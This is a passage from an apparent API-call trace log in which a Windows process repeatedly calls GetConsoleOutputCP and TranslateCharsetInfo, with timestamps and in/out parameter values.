lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.547] GetConsoleOutputCP () returned 0x1b5 [0306.548] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.548] GetConsoleOutputCP () returned 0x1b5 [0306.548] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.548] GetConsoleOutputCP () returned 0x1b5 [0306.549] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.549] GetConsoleOutputCP () returned 0x1b5 [0306.549] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.549] GetConsoleOutputCP () returned 0x1b5 [0306.549] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.549] GetConsoleOutputCP () returned 0x1b5 [0306.550] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.550] GetConsoleOutputCP () returned 0x1b5 [0306.550] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.550] GetConsoleOutputCP () returned 0x1b5 [0306.551] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.551] GetConsoleOutputCP () returned 0x1b5 [0306.551] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.551] GetConsoleOutputCP () returned 0x1b5 [0306.552] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.552] GetConsoleOutputCP () returned 0x1b5 [0306.552] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.552] GetConsoleOutputCP () returned 0x1b5 [0306.553] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.553] GetConsoleOutputCP () returned 0x1b5 [0306.553] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.553] GetConsoleOutputCP () returned 0x1b5 [0306.554] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.554] GetConsoleOutputCP () returned 0x1b5 [0306.554] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.554] GetConsoleOutputCP () returned 0x1b5 [0306.555] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.555] GetConsoleOutputCP () returned 0x1b5 [0306.555] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.555] GetConsoleOutputCP () returned 0x1b5 [0306.555] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.556] GetConsoleOutputCP () returned 0x1b5 [0306.556] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.556] GetConsoleOutputCP () returned 0x1b5 [0306.556] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.556] GetConsoleOutputCP () returned 0x1b5 [0306.557] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.557] GetConsoleOutputCP () returned 0x1b5 [0306.557] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.557] GetConsoleOutputCP () returned 0x1b5 [0306.558] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.558] GetConsoleOutputCP () returned 0x1b5 [0306.558] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.558] GetConsoleOutputCP () returned 0x1b5 [0306.559] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.559] GetConsoleOutputCP () returned 0x1b5 [0306.559] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.559] GetConsoleOutputCP () returned 0x1b5 [0306.560] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.560] GetConsoleOutputCP () returned 0x1b5 [0306.560] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.560] GetConsoleOutputCP () returned 0x1b5 [0306.561] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.561] GetConsoleOutputCP () returned 0x1b5 [0306.561] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.561] GetConsoleOutputCP () returned 0x1b5 [0306.562] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.562] GetConsoleOutputCP () returned 0x1b5 [0306.562] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.562] GetConsoleOutputCP () returned 0x1b5 [0306.562] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.562] GetConsoleOutputCP () returned 0x1b5 [0306.563] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.563] GetConsoleOutputCP () returned 0x1b5 [0306.563] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.563] GetConsoleOutputCP () returned 0x1b5 [0306.564] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.564] GetConsoleOutputCP () returned 0x1b5 [0306.564] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.564] GetConsoleOutputCP () returned 0x1b5 [0306.565] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.565] GetConsoleOutputCP () returned 0x1b5 [0306.565] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.565] GetConsoleOutputCP () returned 0x1b5 [0306.565] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.565] GetConsoleOutputCP () returned 0x1b5 [0306.566] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.566] GetConsoleOutputCP () returned 0x1b5 [0306.566] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.566] GetConsoleOutputCP () returned 0x1b5 [0306.567] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.567] GetConsoleOutputCP () returned 0x1b5 [0306.568] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.568] GetConsoleOutputCP () returned 0x1b5 [0306.568] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.568] GetConsoleOutputCP () returned 0x1b5 [0306.569] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.569] GetConsoleOutputCP () returned 0x1b5 [0306.569] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.569] GetConsoleOutputCP () returned 0x1b5 [0306.570] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.570] GetConsoleOutputCP () returned 0x1b5 [0306.570] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.570] GetConsoleOutputCP () returned 0x1b5 [0306.571] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.571] GetConsoleOutputCP () returned 0x1b5 [0306.571] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.571] GetConsoleOutputCP () returned 0x1b5 [0306.572] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.572] GetConsoleOutputCP () returned 0x1b5 [0306.572] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.572] GetConsoleOutputCP () returned 0x1b5 [0306.573] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.573] GetConsoleOutputCP () returned 0x1b5 [0306.573] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.573] GetConsoleOutputCP () returned 0x1b5 [0306.573] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.573] GetConsoleOutputCP () returned 0x1b5 [0306.574] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.574] GetConsoleOutputCP () returned 0x1b5 [0306.574] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.574] GetConsoleOutputCP () returned 0x1b5 [0306.575] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.575] GetConsoleOutputCP () returned 0x1b5 [0306.575] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.575] GetConsoleOutputCP () returned 0x1b5 [0306.577] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.577] GetConsoleOutputCP () returned 0x1b5 [0306.577] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.577] GetConsoleOutputCP () returned 0x1b5 [0306.578] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.578] GetConsoleOutputCP () returned 0x1b5 [0306.578] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.578] GetConsoleOutputCP () returned 0x1b5 [0306.578] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.578] GetConsoleOutputCP () returned 0x1b5 [0306.579] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.579] GetConsoleOutputCP () returned 0x1b5 [0306.579] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.579] GetConsoleOutputCP () returned 0x1b5 [0306.580] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.580] GetConsoleOutputCP () returned 0x1b5 [0306.580] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.580] GetConsoleOutputCP () returned 0x1b5 [0306.581] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.581] GetConsoleOutputCP () returned 0x1b5 [0306.581] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.581] GetConsoleOutputCP () returned 0x1b5 [0306.582] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.582] GetConsoleOutputCP () returned 0x1b5 [0306.582] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.582] GetConsoleOutputCP () returned 0x1b5 [0306.584] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.584] GetConsoleOutputCP () returned 0x1b5 [0306.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.586] GetConsoleOutputCP () returned 0x1b5 [0306.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.586] GetConsoleOutputCP () returned 0x1b5 [0306.587] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.587] GetConsoleOutputCP () returned 0x1b5 [0306.587] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.587] GetConsoleOutputCP () returned 0x1b5 [0306.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.588] GetConsoleOutputCP () returned 0x1b5 [0306.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.588] GetConsoleOutputCP () returned 0x1b5 [0306.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.589] GetConsoleOutputCP () returned 0x1b5 [0306.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.589] GetConsoleOutputCP () returned 0x1b5 [0306.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.590] GetConsoleOutputCP () returned 0x1b5 [0306.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.590] GetConsoleOutputCP () returned 0x1b5 [0306.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.591] GetConsoleOutputCP () returned 0x1b5 [0306.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.591] GetConsoleOutputCP () returned 0x1b5 [0306.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.592] GetConsoleOutputCP () returned 0x1b5 [0306.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.592] GetConsoleOutputCP () returned 0x1b5 [0306.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.593] GetConsoleOutputCP () returned 0x1b5 [0306.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.593] GetConsoleOutputCP () returned 0x1b5 [0306.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.594] GetConsoleOutputCP () returned 0x1b5 [0306.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.594] GetConsoleOutputCP () returned 0x1b5 [0306.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.594] GetConsoleOutputCP () returned 0x1b5 [0306.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.595] GetConsoleOutputCP () returned 0x1b5 [0306.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.595] GetConsoleOutputCP () returned 0x1b5 [0306.596] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.596] GetConsoleOutputCP () returned 0x1b5 [0306.597] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.597] GetConsoleOutputCP () returned 0x1b5 [0306.597] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.597] GetConsoleOutputCP () returned 0x1b5 [0306.598] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.598] GetConsoleOutputCP () returned 0x1b5 [0306.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.599] GetConsoleOutputCP () returned 0x1b5 [0306.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.599] GetConsoleOutputCP () returned 0x1b5 [0306.600] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.600] GetConsoleOutputCP () returned 0x1b5 [0306.600] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.600] GetConsoleOutputCP () returned 0x1b5 [0306.601] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.601] GetConsoleOutputCP () returned 0x1b5 [0306.601] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.601] GetConsoleOutputCP () returned 0x1b5 [0306.602] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.602] GetConsoleOutputCP () returned 0x1b5 [0306.602] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.602] GetConsoleOutputCP () returned 0x1b5 [0306.603] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.603] GetConsoleOutputCP () returned 0x1b5 [0306.603] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.603] GetConsoleOutputCP () returned 0x1b5 [0306.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.604] GetConsoleOutputCP () returned 0x1b5 [0306.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.604] GetConsoleOutputCP () returned 0x1b5 [0306.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.605] GetConsoleOutputCP () returned 0x1b5 [0306.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.605] GetConsoleOutputCP () returned 0x1b5 [0306.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.605] GetConsoleOutputCP () returned 0x1b5 [0306.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.606] GetConsoleOutputCP () returned 0x1b5 [0306.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.606] GetConsoleOutputCP () returned 0x1b5 [0306.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.607] GetConsoleOutputCP () returned 0x1b5 [0306.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.607] GetConsoleOutputCP () returned 0x1b5 [0306.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.608] GetConsoleOutputCP () returned 0x1b5 [0306.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.608] GetConsoleOutputCP () returned 0x1b5 [0306.608] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.608] GetConsoleOutputCP () returned 0x1b5 [0306.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.609] GetConsoleOutputCP () returned 0x1b5 [0306.609] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.609] GetConsoleOutputCP () returned 0x1b5 [0306.610] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.610] GetConsoleOutputCP () returned 0x1b5 [0306.610] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.610] GetConsoleOutputCP () returned 0x1b5 [0306.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.611] GetConsoleOutputCP () returned 0x1b5 [0306.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.611] GetConsoleOutputCP () returned 0x1b5 [0306.611] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.612] GetConsoleOutputCP () returned 0x1b5 [0306.612] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.612] GetConsoleOutputCP () returned 0x1b5 [0306.612] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: 